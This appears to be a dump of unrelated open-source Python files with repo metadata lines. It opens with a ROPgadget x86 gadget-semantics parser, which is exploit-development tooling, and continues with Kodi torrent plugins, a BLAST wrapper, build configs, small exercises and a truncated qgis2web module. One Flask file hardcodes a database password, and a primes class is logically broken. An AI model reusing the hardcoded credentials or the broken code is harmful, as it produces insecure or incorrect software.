"or": [2, ["operand1 = operand1 | operand2"], ["CF = 0", "OF = 0", "SF", "ZF", "PF"]],
"xor": [2, ["operand1 = operand1 ^ operand2"], ["CF = 0","OF = 0", "SF", "ZF", "PF"]],
"not": [1, ["operand1 = ~ operand1"], []],
"test": [2, ["temp = operand1 & operand2"], ["OF = 0", "CF = 0", "SF", "ZF", "PF"]],
# segment
# others
"lea": [2, ["operand1 = & operand2"], []],
"nop": [0, [], []]
}
class ROPParserX86:
def __init__(self, gadgets, mode):
self.gadgets = gadgets
self.addrs = dict()
self.mode = mode
self.aligned = 0
self.memLoc = []
self.writeMem = {}
if mode == CS_MODE_32:
self.regs = X86.regs32 + X86.FLAG
self.Tregs = X86.Tregs32
self.aligned = 4
self.default = 32
self.sp = "esp"
self.ip = "eip"
else:
self.regs = X86.regs64 + X86.FLAG
self.Tregs = X86.Tregs64
self.aligned = 8
self.default = 64
self.sp = "rsp"
self.ip = "rip"
for k, v in X86.insn.items():
for i, s in enumerate(v[1]):
v[1][i] = s.replace("ssp", self.sp)
for i, s in enumerate(v[2]):
v[2][i] = s.replace("ssp", self.sp)
X86.insn.update({k:v})
def parse(self):
formulas = []
for gadget in self.gadgets:
self.memLoc = []
self.writeMem = {}
regs = {self.sp : Exp(self.sp)}
regs = self.parseInst(regs, gadget["insns"], 0)
if len(regs) == 0:
# gadget cannot parsed
continue
formulas.append(Semantic(regs, gadget["vaddr"], self.memLoc, self.writeMem))
self.addrs.update({hex(gadget["vaddr"]).replace("L",""):gadget["insns"]})
print "================================="
print "Unique gadgets parsed ", len(formulas)
return formulas
def parseInst(self, regs, insts, i):
if i >= len(insts):
return regs
prefix = insts[i]["mnemonic"]
op_str = insts[i]["op_str"].replace("*", " * ")
if prefix not in X86.insn.keys():
# unsupported ins
return {}
ins = X86.insn.get(prefix)
if prefix in X86.Control:
# control transfer ins, end of gadget
if prefix in ["ret", "call"]:
operand1 = None
operand1 = Exp.parseOperand(op_str.split(", ")[0], regs, self.Tregs)
dst = Exp.parseExp(ins[2][0].split())
if operand1 is None:
dst = dst.binding({"operand1":Exp.ExpL(Exp.defaultLength,0)})
else:
dst = dst.binding({"operand1":operand1})
dst = dst.binding(regs)
regs.update({self.ip : dst})
# only ret inst modifies stackpointer
if prefix == "ret":
ssp = regs[self.sp]
ssp = Exp(ssp, "+", Exp(self.aligned))
if operand1 is not None:
ssp = Exp(ssp, "+", operand1)
regs.update({ self.sp :ssp})
return regs
# handle jmp
operand1 = Exp.parseOperand(op_str.split(" ")[0], regs, self.Tregs)
dst = Exp.parseExp(ins[2][0].split())
dst = dst.binding({"operand1":operand1})
dst = dst.binding(regs)
regs.update({self.ip : dst})
return regs
else:
# computing ins
operand1 = None
operand2 = None
operands = {self.sp :regs[self.sp]}
for flag in X86.FLAG:
if flag in regs.keys():
operands.update({flag:regs[flag]})
# handle special cases
if ins[0] == 1:
operand1 = Exp.parseOperand(op_str.split(", ")[0], regs, self.Tregs)
if operand1 is None:
return []
operands.update({"operand1":operand1})
elif ins[0] == 2:
operand1 = Exp.parseOperand(op_str.split(", ")[0], regs, self.Tregs)
operand2 = Exp.parseOperand(op_str.split(", ")[1], regs, self.Tregs)
if operand1 is None or operand2 is None:
return []
operands.update({"operand1":operand1})
operands.update({"operand2":operand2})
if prefix != "lea" and "ptr" in op_str and (operand1.getCategory() == 3 or operand2.getCategory() == 3):
if prefix not in ["cmp", "test", "push"] and "ptr" in op_str.split(", ")[0]:
self.memLoc.append(operand1)
self.writeMem.update({str(operand1):operand1})
else:
self.memLoc.append(operand1 if operand1.getCategory() == 3 else operand2)
# contruct insn operation
if len(ins[1]) > 0:
if prefix == "lea":
reg = op_str.split(", ")[0]
addr = Exp.parseExp(op_str.split("[")[1][:-1].split())
addr = addr.binding(regs)
addr.length = Exp.defaultLength
regs.update({reg:addr})
return self.parseInst(regs, insts, i+1)
if prefix == "xchg":
op1k = op_str.split(", ")[0]
op2k = op_str.split(", ")[1]
op1v = None
op2v = None
if op2k in self.Tregs:
# subpart of register
temp = Exp.parse(self.Tregs[op2k][1], {op2k:operands["operand1"]})
for k, v in temp.items():
v.length = Exp.defaultLength
op2k = k
op2v = v
elif op2k in self.regs:
# register
operands["operand1"].length = Exp.defaultLength
op2v = operands["operand1"]
else:
# mem
op2k = str(operands["operand2"])
op2v = operands["operand1"]
if op1k in self.Tregs:
temp = Exp.parse(self.Tregs[op1k][1], {op1k:operands["operand2"]})
for k, v in temp.items():
v.length = Exp.defaultLength
op1k = k
op1v = v
elif op1k in self.regs:
operands["operand2"].length = Exp.defaultLength
op1v = operands["operand2"]
else:
op1k = str(operands["operand1"])
op1v = operands["operand2"]
regs.update({op1k:op1v})
regs.update({op2k:op2v})
return self.parseInst(regs, insts, i+1)
exps = Exp.parse(ins[1][0], operands)
for reg, val in exps.items():
# handle special case of xor, op1 == op2 clear the register
if prefix == "xor" and op_str.split(", ")[0] == op_str.split(", ")[1]:
val = Exp.ExpL(val.length, 0)
# temp variable, no need to assign
if reg == "temp":
val.length = max(operand1.length, operand2.length)
continue
if "*" in reg:
# this can only be push inst
val.length = Exp.defaultLength
regs.update({"[ " + str(regs[self.sp]) + " ]":val})
continue
dst = Exp.parseOperand(op_str.split(", ")[0], {}, {})
if str(dst) in self.regs:
# general purpose reg
val.length = Exp.defaultLength
regs.update({str(dst):val})
elif str(dst) in self.Tregs:
# subpart of GPRs
temp = Exp.parse(self.Tregs[str(dst)][1], {})
for k, v in temp.items():
v = v.binding(regs)
v = v.binding({str(dst):val})
v.length = Exp.defaultLength
regs.update({k:v})
else:
# mem
regs.update({str(operands["operand1"]):val})
if prefix == "push":
regs.update({self.sp :Exp(regs[self.sp], "+", Exp(self.aligned))})
if prefix == "pop":
regs.update({self.sp :Exp(regs[self.sp], "-", Exp(self.aligned))})
# evaluate flag regs base on exp
if len(ins[2]) != 0:
for flag in ins[2]:
tokens = flag.split()
if len(tokens) == 1:
for k, v in exps.items():
exp = Exp(v, tokens[0][:-1])
exp.length = 1
regs.update({tokens[0]:exp})
else:
f = Exp.parse(flag, {})
for k,v in f.items():
# "CF = 1"
v.length = 1
regs.update({tokens[0]:v})
return self.parseInst(regs, insts, i+1)
if __name__ == '__main__':
binarys = [b"\x8d\x4c\x32\x08\x01\xd8\x81\xc6\x34\x12\x00\x00\xc3",
b"\xbb\x01\x00\x00\x00\x29\xd8\x83\xf8\x01\x0f\x84\x0f\xf9\x01\x00\x5a\xc3"]
gadgets = []
md = Cs(CS_ARCH_X86, CS_MODE_32)
md.detail = True
for binary in binarys:
gadget = []
for decode in md.disasm(binary, 0x1000):
inst = {}
inst.update({"mnemonic": decode.mnemonic})
inst.update({"op_str": decode.op_str})
inst.update({"vaddr": decode.address})
gadget.append(inst)
gadgets.append(gadget)
p = ROPParserX86(gadgets, CS_MODE_32)
formulas = p.parse()
| XiaofanZhang/ROPgadget | ropgadget/ropparse/arch/parserx86.py | Python | gpl-2.0 | 17,183 |
# coding: utf-8
# Module: actions
# Created on: 27.07.2015
# Author: Roman Miroshnychenko aka Roman V.M. (romanvm@yandex.ua)
# Licence: GPL v.3: http://www.gnu.org/copyleft/gpl.html
import os
import xbmcgui
import xbmcplugin
from simpleplugin import Plugin
import json_requests as jsonrq
from buffering import buffer_torrent, stream_torrent, add_torrent, get_videofiles
plugin = Plugin()
_ = plugin.initialize_gettext()
icons = os.path.join(plugin.path, 'resources', 'icons')
commands = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'commands.py')
def _play(path):
"""
Play a videofile
:param path:
:return:
"""
plugin.log_notice('Path to play: {0}'.format(path))
return plugin.resolve_url(path, succeeded=bool(path))
@plugin.action()
def root():
"""
Plugin root
"""
return [{'label': _('Play .torrent file...'),
'thumb': os.path.join(icons, 'play.png'),
'url': plugin.get_url(action='select_torrent', target='play')},
{'label': _('Download torrent from .torrent file...'),
'thumb': os.path.join(icons, 'down.png'),
'url': plugin.get_url(action='select_torrent', target='download'),
'is_folder': False},
{'label': _('Torrents'),
'thumb': plugin.icon,
'url': plugin.get_url(action='torrents')}]
@plugin.action()
def select_torrent(params):
"""
Select .torrent file to play
:param params:
:return:
"""
torrent = xbmcgui.Dialog().browse(1, _('Select .torrent file'), 'video', mask='.torrent')
if torrent:
plugin.log_notice('Torrent selected: {0}'.format(torrent))
if params['target'] == 'play':
return list_files({'torrent': torrent})
else:
download_torrent({'torrent': torrent})
@plugin.action('play')
def play_torrent(params):
"""
Play torrent
:param params:
:return:
"""
file_index = params.get('file_index')
if file_index is not None and file_index != 'dialog':
file_index = int(file_index)
return _play(buffer_torrent(params['torrent'], file_index))
@plugin.action()
def play_file(params):
"""
Stream a file from torrent by its index
The torrent must be already added to the session!
:param params:
:return:
"""
return _play(stream_torrent(int(params['file_index']), params['info_hash']))
@plugin.action('download')
def download_torrent(params):
"""
Add torrent for downloading
:param params:
:return:
"""
jsonrq.add_torrent(params['torrent'], False)
xbmcgui.Dialog().notification('YATP', _('Torrent added for downloading'), plugin.icon, 3000)
@plugin.action()
def torrents():
"""
Display the list of torrents in the session
"""
torrent_list = sorted(jsonrq.get_all_torrent_info(), key=lambda i: i['added_time'], reverse=True)
for torrent in torrent_list:
if torrent['state'] == 'downloading':
label = '[COLOR=red]{0}[/COLOR]'.format(torrent['name'].encode('utf-8'))
elif torrent['state'] == 'seeding':
label = '[COLOR=green]{0}[/COLOR]'.format(torrent['name'].encode('utf-8'))
elif torrent['state'] == 'paused':
label = '[COLOR=gray]{0}[/COLOR]'.format(torrent['name'].encode('utf-8'))
else:
label = '[COLOR=blue]{0}[/COLOR]'.format(torrent['name'].encode('utf-8'))
item = {'label': label,
'url': plugin.get_url(action='show_files', info_hash=torrent['info_hash']),
'is_folder': True}
if torrent['state'] == 'downloading':
item['thumb'] = os.path.join(icons, 'down.png')
elif torrent['state'] == 'seeding':
item['thumb'] = os.path.join(icons, 'up.png')
elif torrent['state'] == 'paused':
item['thumb'] = os.path.join(icons, 'pause.png')
else:
item['thumb'] = os.path.join(icons, 'question.png')
context_menu = [(_('Pause all torrents'),
'RunScript({commands},pause_all)'.format(commands=commands)),
(_('Resume all torrents'),
'RunScript({commands},resume_all)'.format(commands=commands)),
(_('Delete torrent'),
'RunScript({commands},delete,{info_hash})'.format(commands=commands,
info_hash=torrent['info_hash'])),
(_('Delete torrent and files'),
'RunScript({commands},delete_with_files,{info_hash})'.format(commands=commands,
info_hash=torrent['info_hash'])),
(_('Torrent info'),
'RunScript({commands},show_info,{info_hash})'.format(commands=commands,
info_hash=torrent['info_hash'])),
]
if torrent['state'] == 'paused':
context_menu.insert(0, (_('Resume torrent'),
'RunScript({commands},resume,{info_hash})'.format(commands=commands,
info_hash=torrent['info_hash'])))
else:
context_menu.insert(0, (_('Pause torrent'),
'RunScript({commands},pause,{info_hash})'.format(commands=commands,
info_hash=torrent['info_hash'])))
if torrent['state'] == 'incomplete':
context_menu.append((_('Complete download'),
'RunScript({commands},restore_finished,{info_hash})'.format(
commands=commands,
info_hash=torrent['info_hash'])))
item['context_menu'] = context_menu
yield item
def _build_file_list(files, info_hash):
"""
Create the list of videofiles in a torrent
:param files:
:param info_hash:
:return:
"""
videofiles = get_videofiles(files)
for file_ in videofiles:
ext = os.path.splitext(file_[1].lower())[1]
if ext == '.avi':
thumb = os.path.join(icons, 'avi.png')
elif ext == '.mp4':
thumb = os.path.join(icons, 'mp4.png')
elif ext == '.mkv':
thumb = os.path.join(icons, 'mkv.png')
elif ext == '.mov':
thumb = os.path.join(icons, 'mov.png')
else:
thumb = os.path.join(icons, 'play.png')
yield {'label': '{name} [{size}{unit}]'.format(name=file_[1].encode('utf-8'),
size=file_[2] / 1048576,
unit=_('MB')),
'thumb': thumb,
'url': plugin.get_url(action='play_file',
info_hash=info_hash,
file_index=file_[0]),
'is_playable': True,
'info': {'video': {'size': file_[2]}},
}
@plugin.action()
def list_files(params):
"""
Add a torrent to the session and display the list of files in a torrent
:param params:
:return:
"""
torrent_data = add_torrent(params['torrent'])
if torrent_data is not None:
return plugin.create_listing(_build_file_list(torrent_data['files'], torrent_data['info_hash']),
cache_to_disk=True,
sort_methods=(xbmcplugin.SORT_METHOD_LABEL, xbmcplugin.SORT_METHOD_SIZE))
xbmcgui.Dialog().notification(plugin.id, _('Playback cancelled.'), plugin.icon, 3000)
return []
@plugin.action()
def show_files(params):
"""
Display the list of videofiles
:param params:
:return:
"""
return plugin.create_listing(_build_file_list(jsonrq.get_files(params['info_hash']), params['info_hash']),
cache_to_disk=True,
sort_methods=(xbmcplugin.SORT_METHOD_LABEL, xbmcplugin.SORT_METHOD_SIZE))
| kreatorkodi/repository.torrentbr | plugin.video.yatp/libs/client/actions.py | Python | gpl-2.0 | 8,310 |
#-*- coding: utf-8 -*-
"""URL映射"""
from django.views.generic.base import View
from django.http import HttpResponse
from django.shortcuts import render
from jiaxiao.config import site_name, channels, theme
class URLDispatchView(View):
"""URL映射"""
def get(self, request, page_name=''):
"""URL GET"""
if page_name == '':
page_name = 'index'
template_name = '%s/%s.html' % (theme, page_name)
#return HttpResponse(page_name)
return render(request, template_name, {
'site_name': site_name,
'channels': channels,
}) | chinakr/jiaxiao | jiaxiao/home/url_dispatch.py | Python | gpl-2.0 | 613 |
#!/usr/bin/env python
### cut a fasta query (arg1) in "nbPart" (arg3)
### subFasta files and launches a blast programm (arg4)
### vs the bank (arg2) for each subfasta and then
### concatenates the tab delimited blast results in
### one file. You can add any additional blastall option in the
### arg5 with quotes like this : "-e 0.001 -a 2 -W 5"
### example of execution :
### paraBlast.py query.fasta blastdb 10 tblastx "-e 0.001 -a 2 -W 5"
import string
import sys
import os
import subprocess
import tempfile
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from StringIO import StringIO
fastafile = sys.argv[1]
#fastafile = "/bank/fasta/Roth/E1.454.fasta"
bank = sys.argv[2]
#bank = "/bank/blastdb/E1"
nbPart=int(sys.argv[3])
#nbPart=int(5)
my_blast_prog = sys.argv[4]
#my_blast_prog = "tblastx"
blastOpt=sys.argv[5]
#blastOpt="-e 0.001 -a 2 -W 5"
my_blast_exe = "/usr/local/bin/blast/bin/blastall"
nbResidues=0
meanLen=0
nbSeqs=0
seqs=[]
#### reading the fasta file to cut
handle = open(fastafile)
for seq_record in SeqIO.parse(handle, "fasta"):
seqs.append(seq_record)
nbSeqs+=1
nbResidues+=len(seq_record.seq)
handle.close()
#### prints some infos about the input fasta file
meanLen=nbResidues/nbSeqs
print "sequences -- residues -- mean sequence length"
print nbSeqs,"--",nbResidues,"--", meanLen
#### creates a temp directory and
#### writes the divided-input fasta files into it
wDir= "/scratch/USERS/prestat"
tmpDir=tempfile.mkdtemp(prefix="parablast",dir= wDir)
nbSeqsbyfile=nbSeqs/nbPart
modulo=nbSeqs%nbPart
iteSeqs=0
for i in range(0,nbPart-1):
tmpFasta=tempfile.mkstemp(dir=tmpDir,suffix="."+str(i)+".fasta")
SeqIO.write(seqs[iteSeqs:iteSeqs+nbSeqsbyfile], tmpFasta[1], "fasta")
iteSeqs+=nbSeqsbyfile
tmpFasta=tempfile.mkstemp(dir=tmpDir,suffix="."+str(nbPart)+".fasta")
SeqIO.write(seqs[iteSeqs:nbSeqs], tmpFasta[1], "fasta")
#### runs the blast
my_blast_files = os.listdir(tmpDir)
myProcesses=[]
for blast_file in my_blast_files:
cmd= "blastall -m 8"+" "+ " "+\
"-p"+" "+ my_blast_prog + " "+\
"-i"+" "+ tmpDir+"/"+blast_file + " "+\
"-d"+" "+ bank + " "+\
"-o"+" "+ tmpDir+"/"+blast_file.replace("fasta","blast") + " "+\
blastOpt
myProcesses.append(subprocess.Popen(cmd,shell=True))
#### waits for the end of all processes
for i in myProcesses:
i.wait()
#### concatenates the blast files results
#### and removes the temp files used
os.system("cat " + tmpDir+"/"+"*.blast > "+ wDir + '/' + str.split(fastafile,'/')[-1]+".vs."+str.split(bank,'/')[-1]+".blast")
os.system("rm -rf "+ tmpDir)
| alunem/bioman | blast/bmn-paraBlastKepler.py | Python | gpl-2.0 | 2,591 |
import os
# toolchains options
ARCH='arm'
CPU='cortex-m4'
CROSS_TOOL='keil'
if os.getenv('RTT_CC'):
CROSS_TOOL = os.getenv('RTT_CC')
# cross_tool provides the cross compiler
# EXEC_PATH is the compiler execute path, for example, CodeSourcery, Keil MDK, IAR
if CROSS_TOOL == 'gcc':
PLATFORM = 'gcc'
EXEC_PATH = 'D:/SourceryGCC/bin'
elif CROSS_TOOL == 'keil':
PLATFORM = 'armcc'
EXEC_PATH = 'C:/Keil_v5'
elif CROSS_TOOL == 'iar':
print('================ERROR============================')
print('Not support iar yet!')
print('=================================================')
exit(0)
if os.getenv('RTT_EXEC_PATH'):
EXEC_PATH = os.getenv('RTT_EXEC_PATH')
BUILD = 'debug'
if PLATFORM == 'gcc':
# toolchains
PREFIX = 'arm-none-eabi-'
CC = PREFIX + 'gcc'
AS = PREFIX + 'gcc'
AR = PREFIX + 'ar'
LINK = PREFIX + 'gcc'
TARGET_EXT = 'elf'
SIZE = PREFIX + 'size'
OBJDUMP = PREFIX + 'objdump'
OBJCPY = PREFIX + 'objcopy'
DEVICE = ' -mcpu=cortex-m4 -mthumb -ffunction-sections -fdata-sections'
CFLAGS = DEVICE
AFLAGS = ' -c' + DEVICE + ' -x assembler-with-cpp'
LFLAGS = DEVICE + ' -Wl,--gc-sections,-Map=rtthread.map,-cref,-u,Reset_Handler -T board/linker_scripts/link.lds'
CPATH = ''
LPATH = ''
if BUILD == 'debug':
CFLAGS += ' -O0 -gdwarf-2'
AFLAGS += ' -gdwarf-2'
else:
CFLAGS += ' -O2'
POST_ACTION = OBJCPY + ' -O binary $TARGET rtthread.bin\n' + SIZE + ' $TARGET \n'
elif PLATFORM == 'armcc':
# toolchains
CC = 'armcc'
AS = 'armasm'
AR = 'armar'
LINK = 'armlink'
TARGET_EXT = 'axf'
DEVICE = ' --device DARMSTM'
CFLAGS = DEVICE + ' --apcs=interwork'
AFLAGS = DEVICE
LFLAGS = DEVICE + ' --info sizes --info totals --info unused --info veneers --list rtthread.map --scatter "board\linker_scripts\link.sct"'
CFLAGS += ' --c99'
CFLAGS += ' -I' + EXEC_PATH + '/ARM/RV31/INC'
LFLAGS += ' --libpath ' + EXEC_PATH + '/ARM/RV31/LIB'
EXEC_PATH += '/arm/bin40/'
if BUILD == 'debug':
CFLAGS += ' -g -O0'
AFLAGS += ' -g'
else:
CFLAGS += ' -O2'
POST_ACTION = 'fromelf --bin $TARGET --output rtthread.bin \nfromelf -z $TARGET'
| blueskycoco/rt-thread | bsp/nrf5x/nrf52840/rtconfig.py | Python | gpl-2.0 | 2,265 |
class int(int):
def isPrime(self):
for q in range(2, int(self**(1/2))):
if self%q:
print(self,q,self%q)
else:
return 0
return 1
| cabanm/project-euler | primes.py | Python | gpl-2.0 | 212 |
#!/usr/bin/env python
#Name: Ian Wong
#Date: 1/3/16
#Assignment: Counting Vowels
string = input("What is your string?")
string = string.lower()
count1= string.count('a')
count2 = string.count('e')
count3 = string.count('i')
count4 = string.count('o')
count5 = string.count('u')
print ("There are %i a in the text." % (count1))
print ("There are %i e in the text." % (count2))
print ("There are %i i in the text." % (count3))
print ("There are %i o in the text." % (count4))
print ("There are %i u in the text." % (count5))
| barrowkwan/Python_Class_2014 | Ian/hw2.py | Python | gpl-2.0 | 527 |
# coding:utf-8
'''
Created on 19/1/2015
@author: PC30
'''
from flaskext.mysql import MySQL#importar mysql
from flask import Flask#importar flask
class DBcon():
'''
classdocs
'''
pass
def __init__(self):
'''
Constructor
'''
pass
def conexion(self):
mysql = MySQL()#llamando a mysql
app = Flask(__name__)#instanciando a flask
app.config['MYSQL_DATABASE_USER'] = 'python'#nombre de usuario
app.config['MYSQL_DATABASE_PASSWORD'] = '123456'#contrase�a de ususario
app.config['MYSQL_DATABASE_DB'] = 'sisventas'#nombre de la base de datos
app.config['MYSQL_DATABASE_HOST'] = 'localhost'#servidor donde se encuantra
mysql.init_app(app)
return mysql
| git-pedro-77/proyecto_final_p_f | proyectoITSAE/ec/edu/itsae/conn/DBcon.py | Python | gpl-2.0 | 772 |
import xbmcaddon
import xbmcgui
import subprocess,os
def EstoEsUnaFun( str ):
xbmcgui.Dialog().ok("ESO ES","AHHHH",str)
return
addon = xbmcaddon.Addon()
addonname = addon.getAddonInfo('name')
line1 = "Hello World!"
line2 = "We can write anything we want here"
line3 = "Using Python"
my_setting = addon.getSetting('my_setting') # returns the string 'true' or 'false'
addon.setSetting('my_setting', 'false')
os.system("echo caca>>/home/rafa400/caca.txt")
dia=xbmcgui.Dialog();
dia.addControl(xbmcgui.ControlLabel(x=190, y=25, width=500, height=25, label="Hoooolaa"))
dia.ok(addonname, line1, line2, line3 + my_setting)
#xbmcgui.Window().show()
| rafa400/telepi | script.telepi-master/addon.py | Python | gpl-2.0 | 669 |
import re
import traceback
import os
import codecs
from urlparse import parse_qs
from PyQt4.QtCore import QCoreApplication
from qgis.core import (QgsRenderContext,
QgsSingleSymbolRendererV2,
QgsCategorizedSymbolRendererV2,
QgsGraduatedSymbolRendererV2,
QgsHeatmapRenderer,
QgsCoordinateReferenceSystem,
QgsCoordinateTransform,
QgsMessageLog)
from utils import safeName, is25d, BLEND_MODES
from basemaps import basemapOL
def writeLayersAndGroups(layers, groups, visible, folder, popup,
settings, json, matchCRS, clustered, iface,
restrictToExtent, extent):
canvas = iface.mapCanvas()
basemapList = settings["Appearance"]["Base layer"]
basemaps = [basemapOL()[item] for _, item in enumerate(basemapList)]
if len(basemapList) > 1:
baseGroup = "Base maps"
else:
baseGroup = ""
baseLayer = """var baseLayer = new ol.layer.Group({
'title': '%s',
layers: [%s\n]
});""" % (baseGroup, ','.join(basemaps))
layerVars = ""
layer_names_id = {}
for count, (layer, encode2json, cluster) in enumerate(zip(layers, json,
clustered)):
layer_names_id[layer.id()] = str(count)
try:
if is25d(layer, canvas, restrictToExtent, extent):
pass
else:
layerVars += "\n".join([layerToJavascript(iface, layer,
encode2json,
matchCRS, cluster,
restrictToExtent,
extent, count)])
except:
layerVars += "\n".join([layerToJavascript(iface, layer,
encode2json, matchCRS,
cluster,
restrictToExtent,
extent, count)])
groupVars = ""
groupedLayers = {}
for group, groupLayers in groups.iteritems():
groupVars += ('''var %s = new ol.layer.Group({
layers: [%s],
title: "%s"});\n''' %
("group_" + safeName(group),
",".join(["lyr_" + safeName(layer.name())
+ layer_names_id[layer.id()]
for layer in groupLayers]),
group))
for layer in groupLayers:
groupedLayers[layer.id()] = safeName(group)
mapLayers = ["baseLayer"]
usedGroups = []
osmb = ""
for count, layer in enumerate(layers):
try:
renderer = layer.rendererV2()
if is25d(layer, canvas, restrictToExtent, extent):
shadows = ""
renderer = layer.rendererV2()
renderContext = QgsRenderContext.fromMapSettings(
canvas.mapSettings())
fields = layer.pendingFields()
renderer.startRender(renderContext, fields)
for feat in layer.getFeatures():
if isinstance(renderer, QgsCategorizedSymbolRendererV2):
classAttribute = renderer.classAttribute()
attrValue = feat.attribute(classAttribute)
catIndex = renderer.categoryIndexForValue(attrValue)
categories = renderer.categories()
symbol = categories[catIndex].symbol()
elif isinstance(renderer, QgsGraduatedSymbolRendererV2):
classAttribute = renderer.classAttribute()
attrValue = feat.attribute(classAttribute)
ranges = renderer.ranges()
for range in ranges:
if (attrValue >= range.lowerValue() and
attrValue <= range.upperValue()):
symbol = range.symbol().clone()
else:
symbol = renderer.symbolForFeature2(feat,
renderContext)
symbolLayer = symbol.symbolLayer(0)
if not symbolLayer.paintEffect().effectList()[0].enabled():
shadows = "'2015-07-15 10:00:00'"
renderer.stopRender(renderContext)
osmb = """
var osmb = new OSMBuildings(map).date(new Date({shadows}));
osmb.set(geojson_{sln}{count});""".format(shadows=shadows,
sln=safeName(layer.name()),
count=unicode(count))
else:
mapLayers.append("lyr_" + safeName(layer.name()) +
unicode(count))
except:
QgsMessageLog.logMessage(traceback.format_exc(), "qgis2web",
level=QgsMessageLog.CRITICAL)
mapLayers.append("lyr_" + safeName(layer.name()) + unicode(count))
visibility = ""
for layer, v in zip(mapLayers[1:], visible):
visibility += "\n".join(["%s.setVisible(%s);" % (layer,
unicode(v).lower())])
group_list = ["baseLayer"] if len(basemapList) else []
no_group_list = []
for count, layer in enumerate(layers):
try:
if is25d(layer, canvas, restrictToExtent, extent):
pass
else:
if layer.id() in groupedLayers:
groupName = groupedLayers[layer.id()]
if groupName not in usedGroups:
group_list.append("group_" + safeName(groupName))
usedGroups.append(groupName)
else:
no_group_list.append("lyr_" + safeName(layer.name()) +
unicode(count))
except:
if layer.id() in groupedLayers:
groupName = groupedLayers[layer.id()]
if groupName not in usedGroups:
group_list.append("group_" + safeName(groupName))
usedGroups.append(groupName)
else:
no_group_list.append("lyr_" + safeName(layer.name()) +
unicode(count))
layersList = []
for layer in (group_list + no_group_list):
layersList.append(layer)
layersListString = "var layersList = [" + ",".join(layersList) + "];"
fieldAliases = ""
fieldImages = ""
fieldLabels = ""
blend_mode = ""
for count, (layer, labels) in enumerate(zip(layers, popup)):
sln = safeName(layer.name()) + unicode(count)
if layer.type() == layer.VectorLayer and not is25d(layer, canvas,
restrictToExtent,
extent):
fieldList = layer.pendingFields()
aliasFields = ""
imageFields = ""
labelFields = ""
for field, label in zip(labels.keys(), labels.values()):
labelFields += "'%(field)s': '%(label)s', " % (
{"field": field, "label": label})
labelFields = "{%(labelFields)s});\n" % (
{"labelFields": labelFields})
labelFields = "lyr_%(name)s.set('fieldLabels', " % (
{"name": sln}) + labelFields
fieldLabels += labelFields
for f in fieldList:
fieldIndex = fieldList.indexFromName(unicode(f.name()))
aliasFields += "'%(field)s': '%(alias)s', " % (
{"field": f.name(),
"alias": layer.attributeDisplayName(fieldIndex)})
widget = layer.editFormConfig().widgetType(fieldIndex)
imageFields += "'%(field)s': '%(image)s', " % (
{"field": f.name(),
"image": widget})
aliasFields = "{%(aliasFields)s});\n" % (
{"aliasFields": aliasFields})
aliasFields = "lyr_%(name)s.set('fieldAliases', " % (
{"name": sln}) + aliasFields
fieldAliases += aliasFields
imageFields = "{%(imageFields)s});\n" % (
{"imageFields": imageFields})
imageFields = "lyr_%(name)s.set('fieldImages', " % (
{"name": sln}) + imageFields
fieldImages += imageFields
blend_mode = """lyr_%(name)s.on('precompose', function(evt) {
evt.context.globalCompositeOperation = '%(blend)s';
});""" % (
{"name": sln,
"blend": BLEND_MODES[layer.blendMode()]})
path = os.path.join(folder, "layers", "layers.js")
with codecs.open(path, "w", "utf-8") as f:
if basemapList:
f.write(baseLayer + "\n")
f.write(layerVars + "\n")
f.write(groupVars + "\n")
f.write(visibility + "\n")
f.write(layersListString + "\n")
f.write(fieldAliases)
f.write(fieldImages)
f.write(fieldLabels)
f.write(blend_mode)
return osmb
def layerToJavascript(iface, layer, encode2json, matchCRS, cluster,
restrictToExtent, extent, count):
if layer.hasScaleBasedVisibility():
if layer.minimumScale() != 0:
minRes = 1 / ((1 / layer.minimumScale()) * 39.37 * 90.7)
minResolution = "\nminResolution:%s,\n" % unicode(minRes)
else:
minResolution = ""
if layer.maximumScale() != 0:
maxRes = 1 / ((1 / layer.maximumScale()) * 39.37 * 90.7)
maxResolution = "maxResolution:%s,\n" % unicode(maxRes)
else:
maxResolution = ""
else:
minResolution = ""
maxResolution = ""
layerName = safeName(layer.name()) + unicode(count)
attrText = layer.attribution()
attrUrl = layer.attributionUrl()
layerAttr = '<a href="%s">%s</a>' % (attrUrl, attrText)
if layer.type() == layer.VectorLayer and not is25d(layer,
iface.mapCanvas(),
restrictToExtent,
extent):
renderer = layer.rendererV2()
if (cluster and isinstance(renderer, QgsSingleSymbolRendererV2)):
cluster = True
else:
cluster = False
if isinstance(renderer, QgsHeatmapRenderer):
pointLayerType = "Heatmap"
hmRadius = renderer.radius()
colorRamp = renderer.colorRamp()
hmStart = colorRamp.color1().name()
hmEnd = colorRamp.color2().name()
hmRamp = "['" + hmStart + "', "
hmStops = colorRamp.stops()
for stop in hmStops:
hmRamp += "'" + stop.color.name() + "', "
hmRamp += "'" + hmEnd + "']"
hmWeight = renderer.weightExpression()
hmWeightId = layer.fieldNameIndex(hmWeight)
hmWeightMax = layer.maximumValue(hmWeightId)
else:
pointLayerType = "Vector"
if matchCRS:
mapCRS = iface.mapCanvas().mapSettings().destinationCrs().authid()
crsConvert = """
{dataProjection: 'EPSG:4326', featureProjection: '%(d)s'}""" % {
"d": mapCRS}
else:
crsConvert = """
{dataProjection: 'EPSG:4326', featureProjection: 'EPSG:3857'}"""
if layer.providerType() == "WFS" and not encode2json:
layerCode = '''var format_%(n)s = new ol.format.GeoJSON();
var jsonSource_%(n)s = new ol.source.Vector({
attributions: [new ol.Attribution({html: '%(layerAttr)s'})],
format: format_%(n)s
});''' % {"n": layerName, "layerAttr": layerAttr}
if cluster:
layerCode += '''cluster_%(n)s = new ol.source.Cluster({
distance: 10,
source: jsonSource_%(n)s
});''' % {"n": layerName}
layerCode += '''var lyr_%(n)s = new ol.layer.Vector({
source: ''' % {"n": layerName}
if cluster:
layerCode += 'cluster_%(n)s,' % {"n": layerName}
else:
layerCode += 'jsonSource_%(n)s,' % {"n": layerName}
layerCode += '''%(min)s %(max)s
style: style_%(n)s,
title: "%(name)s"
});
function get%(n)sJson(geojson) {
var features_%(n)s = format_%(n)s.readFeatures(geojson);
jsonSource_%(n)s.addFeatures(features_%(n)s);
}''' % {
"name": layer.name(), "n": layerName,
"min": minResolution, "max": maxResolution}
return layerCode
else:
layerCode = '''var format_%(n)s = new ol.format.GeoJSON();
var features_%(n)s = format_%(n)s.readFeatures(geojson_%(n)s, %(crs)s);
var jsonSource_%(n)s = new ol.source.Vector({
attributions: [new ol.Attribution({html: '%(layerAttr)s'})],
});
